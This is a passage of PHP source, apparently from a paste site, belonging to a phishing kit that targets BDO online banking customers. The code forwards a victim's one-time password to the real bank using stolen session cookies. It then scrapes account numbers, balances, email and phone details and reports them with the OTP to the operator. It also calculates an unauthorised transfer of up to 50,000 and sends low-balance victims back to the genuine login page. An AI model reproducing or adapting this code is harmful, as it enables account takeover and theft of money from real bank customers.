- "Wicket-FocusedElementId: ".$wicked,
- "Content-Length: ". strlen($OTP),
- "DNT: 1",
- "Origin: https://online.bdo.com.ph",
- // "Referer: https://online.bdo.com.ph/sso/otpgenerator",
- "Cookie: ". $_SESSION['goldHead']['/sso'],
- "Connection: close"
- );
- $OTPresp = curlContents(strtok($_SESSION['goldHead']['Location'], '?')."?x=".$key."&random=0.".md5(date("h:i:s")),"POST", $OTP, $headersOTP, true, false);
- updateGold($OTPresp['header']);
- $OTPstat = $OTPresp['contents'];
- if(strlen($OTPstat) < 2 && !empty($_SESSION['goldHead']['Location'])) {
- if($_SESSION['goldHead']['Location'] == "josso_otplogout_locked/") {
- @session_destroy();
- @session_unset();
- header("Location: https://online.bdo.com.ph/sso/login?action=5");
- exit;
- }
- $_SESSION['ajaxloc'] = $_SESSION['goldHead']['Location'];
- $_SESSION['OTP1'] = "done";
- $_SESSION['process'] = "transfer";
- $otpStat = "One-Time Password (OTP) has expired.<br>Please generate new PIN.";
- $_SESSION['otpStat'] = "One-Time Password (OTP) has expired.<br>Please generate new PIN.";
- act2();
- $l1 = array(
- "Host: online.bdo.com.ph",
- "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0",
- "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
- "DNT: 1",
- "Connection: close",
- "Cookie: ". $_SESSION['goldHead']['/sso'],
- "Upgrade-Insecure-Requests: 1"
- );
- $l1Stat = curlContents($_SESSION['goldHead']['Location'],"GET", false, $l1, true, false);
- updateGold($l1Stat['header']);
- $dom = new DOMDocument();
- @$dom->loadHTML($l1Stat['contents']);
- $xpath = new DOMXPath($dom);
- $tags = $xpath->query('//tr[@class="even"]');
- $tds = $xpath->query('//span');
- // echo count($tds)." span\r\n";
- // echo count($tags)." tr\r\n";
- // exit;
- if(!isset($_SESSION['d_'])) {
- foreach($tags as $line) {
- $tds = $xpath->query('//span');
- for ($x=0;$x<count($tds);$x++) {
- $xyz = str_replace(array("\r","\n","\t","\0"," "," "), array("","","","","",""), $tds->item($x)->nodeValue);
- if(strlen($xyz) >1) {
- @$_SESSION['d_'] .= $xyz."|";
- }
- }
- }
- }
- if (!isset($_SESSION['reZ'])) {
- $_SESSION['reZ'] = array_chunk(explode("|",getBetween(@$_SESSION['d_'],"Actions|", "|BDOUnibankissuper")),7);
- for($i=0;$i<count($_SESSION['reZ']);$i++) {
- if(!empty($_SESSION['reZ'][$i])) {
- $c = $i;
- if(explode(".",preg_replace("/[^0-9\.]/", "", @$_SESSION['reZ'][$i][5]))[0] > @$_SESSION['account_X'][1]) {
- @$_SESSION['account_dump'] = @$_SESSION['account_dump']." | ".implode(":",@$_SESSION['reZ'][$i]);
- @$_SESSION['account_X'][0] = @$_SESSION['reZ'][$i][2];
- @$_SESSION['account_X'][1] = explode(".",preg_replace("/[^0-9\.]/", "", @$_SESSION['reZ'][$i][5]))[0];
- }
- }
- }
- }
- // EXTRACT EMAIL + NUMBER
- // print_r($_SESSION['goldHead']);
- $uci = array(
- "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0",
- "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
- "Accept-Language: en-US,en;q=0.5",
- "Connection: close",
- "Cookie: JSESSIONID=44cfa265c5e7fb7a21eec1b06b54; JOSSO_SESSIONID=-",
- "Upgrade-Insecure-Requests: 1"
- );
- $uciStat = curlContents("https://www.mybdo.com.ph/fo/updateclientinformation","GET", false, $uci, true, false);
- updateGold($uciStat['header']);
- // echo $_SESSION['goldHead']['Location']."\r\n";
- //================================================================//
- $uci1 = array(
- "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0",
- "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
- "Accept-Language: en-US,en;q=0.5",
- "Connection: close",
- "Cookie: ".$_SESSION['goldHead']['/fo'],
- "Upgrade-Insecure-Requests: 1"
- );
- $uci1Stat = curlContents($_SESSION['goldHead']['Location'],"GET", false, $uci1, true, false);
- updateGold($uci1Stat['header']);
- // echo $_SESSION['goldHead']['Location']."\r\n";
- //================================================================//
- $uci2 = array(
- "Host: online.bdo.com.ph",
- "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0",
- "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
- "Accept-Language: en-US,en;q=0.5",
- "Connection: close",
- "Cookie: ".$_SESSION['goldHead']['/sso-gateway'],
- "Upgrade-Insecure-Requests: 1"
- );
- $uci2Stat = curlContents($_SESSION['goldHead']['Location'],"GET", false, $uci2, true, false);
- updateGold($uci2Stat['header']);
- // echo $_SESSION['goldHead']['Location']."\r\n";
- //================================================================//
- $uci3 = array(
- "Host: www.mybdo.com.ph",
- "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0",
- "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
- "Accept-Language: en-US,en;q=0.5",
- "Connection: close",
- "Cookie: ".$_SESSION['goldHead']['/fo'],
- "Upgrade-Insecure-Requests: 1"
- );
- $uci3Stat = curlContents($_SESSION['goldHead']['Location'],"GET", false, $uci3, true);
- updateGold($uci3Stat['header']);
- // echo $_SESSION['goldHead']['Location']."\r\n";
- $uci3Stat = curlContents($_SESSION['goldHead']['Location'],"GET", false, $uci3, true);
- updateGold($uci3Stat['header']);
- // echo $_SESSION['goldHead']['Location']."\r\n";
- $uci3Stat = curlContents($_SESSION['goldHead']['Location'],"GET", false, $uci3, true);
- updateGold($uci3Stat['header']);
- // echo $_SESSION['goldHead']['Location']."\r\n";
- //================================================================//
- $uci4 = array(
- "Host: online.bdo.com.ph",
- "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0",
- "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
- "Accept-Language: en-US,en;q=0.5",
- "Connection: close",
- "Cookie: ".$_SESSION['goldHead']['/sso-gateway'],
- "Upgrade-Insecure-Requests: 1"
- );
- $uci4Stat = curlContents($_SESSION['goldHead']['Location'],"GET", false, $uci4, true, false);
- updateGold($uci4Stat['header']);
- // echo $_SESSION['goldHead']['Location']."\r\n";
- //================================================================//
- $uci5 = array(
- "Host: www.mybdo.com.ph",
- "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0",
- "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
- "Accept-Language: en-US,en;q=0.5",
- "Connection: close",
- "Cookie: ".$_SESSION['goldHead']['/fo'],
- "Upgrade-Insecure-Requests: 1"
- );
- $uci5Stat = curlContents($_SESSION['goldHead']['Location'],"GET", false, $uci5, true);
- updateGold($uci5Stat['header']);
- // echo $_SESSION['goldHead']['Location']."\r\n";
- //================================================================//
- $uci6 = array(
- "Host: www.mybdo.com.ph",
- "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0",
- "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8",
- "Accept-Language: en-US,en;q=0.5",
- "Connection: close",
- "Cookie: ".$_SESSION['goldHead']['/fo'],
- "Upgrade-Insecure-Requests: 1"
- );
- $uci6Stat = curlContents($_SESSION['goldHead']['Location'],"GET", false, $uci6, true);
- updateGold($uci6Stat['header']);
- // echo $_SESSION['goldHead']['Location']."\r\n";
- $uci6Stat = curlContents($_SESSION['goldHead']['Location'],"GET", false, $uci6, true);
- updateGold($uci6Stat['header']);
- // echo $_SESSION['goldHead']['Location']."\r\n";
- $dom = new DOMDocument();
- @$dom->loadHTML($uci6Stat['contents']);
- $xpath = new DOMXPath($dom);
- $en = $xpath->query('//td[@style="text-align:left !important"]//span');
- if (!isset($_SESSION['email_number'])) {
- for ($i=0;$i<count($en);$i++) {
- if (!empty($en->item($i)->nodeValue) && strlen($en->item($i)->nodeValue) > 5) {
- @$_SESSION['email_number'] .= $en->item($i)->nodeValue." | ";
- }
- }
- }
- if($_SESSION['plat_'] == "form") {
- $_SESSION['kraKen'] = "platform";
- } else {
- $_SESSION['kraKen'] = "release";
- }
- ///////////////
- $go = http_build_query([
- "auth" => "report",
- "json" => json_encode([
- "auth" => "report",
- "status" => "OTP",
- "info" => "—» \r\n[<crimson> ".( $_SESSION['plat_'] == "form" ? "SMS-GEN" : "OTP-GEN" )." </crimson>] <font color='white'>user: ".$_SESSION['user']."</font> sucessfully entered otp [<crimson> ".$otp_." </crimson>] \r[ ACC-INFO ] ".@$_SESSION['email_number'].@$_SESSION['account_dump'],
- "site" => $site
- ])
- ]);
- fLy($go);
- $fee = 100;
- // $transfer = 100;
- // $accBal = str_replace(",","",explode(".",preg_replace("/[^0-9\.]/", "", @$_SESSION['account_X'][1])))[0];
- // if(100000 >= 50200) {
- // print_r(@$_SESSION['account_X']); exit;
- //=================================== [TEST ]
- // print_r(@$_SESSION['d_']);
- // print_r(@$_SESSION['reZ']);
- // echo @$_SESSION['account_dump']."\r\n";
- // print_r(@$_SESSION['account_X']);
- // header('Content-Type: text/plain; charset=utf-8');
- // exit;
- //=================================== [TEST ]
- if(@$_SESSION['account_X'][1] >= 50200) {
- if($_SESSION['available_Bank'][1] >= @$_SESSION['account_X'][1]) {
- @$_SESSION['transfer'] = 50000;
- } else {
- @$_SESSION['transfer'] = $_SESSION['available_Bank'][1];
- }
- } elseif(@$_SESSION['account_X'][1] >= 200) {
- if($_SESSION['available_Bank'][1] >= (@$_SESSION['account_X'][1] - $fee)) {
- @$_SESSION['transfer'] = (@$_SESSION['account_X'][1] - $fee);
- } else {
- @$_SESSION['transfer'] = $_SESSION['available_Bank'][1];
- }
- } else {
- //=================================== [TEST ]
- // echo "FAIL\r\n\r\n\r\n";
- // echo "D:: ".@$_SESSION['d_']."\r\n\r\nREZ:: ";
- // print_r(@$_SESSION['reZ']);
- // echo "\r\n\r\n".@$_SESSION['account_dump']."\r\n".@$_SESSION['account_X'][1]."\r\n";
- // print_r(@$_SESSION['account_X']);
- // header('Content-Type: text/plain; charset=utf-8');
- // exit;
- //=================================== [TEST ]
- $go = http_build_query([
- "auth" => "report",
- "json" => json_encode([
- "auth" => "report",
- "status" => "LOW-BAL",
- "info" => "—» [".getUserIP()."] [<crimson>".$_SESSION['user']."</crimson>] <font color='white'>A user was redirected to dump-site (josso_otplogout_locked) due to ".( implode("|",@$_SESSION['account_X']) == "" ? "NULL-ACCOUNT:: ??" : "LOW-BALANCE :: ".implode("|",@$_SESSION['account_X']) )." </font> \r[<crimson> FUCK × SHETT </crimson>]",
- "site" => $site
- ])
- ]);
- fLy($go);
- session_destroy();
- session_unset();
- header("Location: https://online.bdo.com.ph/sso/login?action=5");
- }
- // exit("success!");
- } else {
- $dom = new DOMDocument();
- @$dom->loadHTML($OTPstat);
- $xpath = new DOMXPath($dom);
- $tags = $xpath->query('//span[@class="feedbackPanelERROR"]');
- $otpStat = @$tags->item(0)->nodeValue;
- }
- }
- } else {
- if(!empty($_POST['otp'])) {
- $otpStat = "Error. Please enter a 6 digit One-Time Password (OTP)";
- } else {
- $otpStat = "Error. One-Time Password (OTP) is required";
- }
- }
- if (empty($otpStat)) {
- $otpStat = @$_SESSION['otpStat'];
- }
- } else {
- $otpStat = "Unexpected error: Server Maintenance";
- }
- }
- if(@$otpType == "S") {
- @$_SESSION['plat_'] = "form";
- require '_hid_/otp2.html';
- } else {
- @$_SESSION['plat_'] = "device";
- require '_hid_/otp.html';
- }
- @ob_end_flush(); @ob_flush();
- break;
- }
- } else {
- header("Location: /otp/" . @$_SESSION['thicc'] . "/process");
- }
- } else {
- if (file_exists(@$sitedefault)) {
- require @$sitedefault;
- } else {
- header('Location: net::ERR_CONNECTION_REFUSED');
- // header("HTTP/1.0 500 Internal Server Error");
- exit;
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment